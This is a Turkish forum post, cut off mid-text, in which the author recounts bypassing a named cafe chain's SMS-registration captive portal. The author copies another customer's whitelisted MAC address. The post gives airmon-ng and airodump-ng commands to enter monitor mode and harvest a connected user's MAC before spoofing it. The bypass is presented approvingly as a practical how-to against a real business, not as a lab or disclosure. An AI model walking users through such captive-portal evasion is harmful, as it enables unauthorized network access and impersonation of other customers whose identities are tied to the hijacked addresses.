Geçtiğimiz haftalarda MackBear isimli self servis bir kafeye laptopumla otizmlemek için gittim. Bu mackbear türkiyenin batıdaki pek çok şehrinde 120'den fazla şubesi olan bir franchise.
Ağlarına bağlanmak istediğimde şifresiz olduğunu gördüm, internete erişmeye çalıştığımdaysa router bir kullanıcı kayıt ekranına yönlendirdi. Telefon numaranıza gelen bir SMS ile kaydolmanızı istiyor, giriş yaptıktan sonra da internete erişmenize izin veriyor. Tabiki de adım, tc'm, telefon numaram gibi kişisel verilerimi bu ne bok olduğu belirsiz kurumla paylaşmak istemedim. Paranoyam bir yana, yarın bir gün bunların datalarının da folloş olup 12 yaşındaki disc*rdçu çocukların elinde gezmeyeceği malum değil.
Kullanıcı doğrulama sistemi üzerine düşündüm, giriş yapmış kullanıcılarla yapmamış kullanıcılar arasındaki fark neydi? Ağa bağlanırken herhangi bir kullanıcı adı vs. sormuyor, bir proxy kullanıcı doğrulama sistemi de yok. Ip adresi statik değil. Geriye yalnızca giriş yapanların mac adresinin beyaz listeye alınmış olması kalıyor. Kafedeki diğer kullanıcılardan birinin mac adresini kopyalamak için kolları sıvadım.
#wifi kartını monitör moduna sok
sudo airmon-ng check kill
sudo airmon-ng start wlan1
#ağa bağlı istasyonlardan herhangi birinin mac adresini kopyala
sudo airodump-ng --bssid <kafe_ağı_ssid> wlan1mon
#monitör modunu kapat ve wlan1 wifi interface'ini kapat
sudo airmon-ng stop wlan1mon
sudo ip link set dev wlan1 down
#Mac adresimi kopyaladığım diğer müşterilerden birine ait mac adresiyle değiş
Post too long. Click here to view the full text.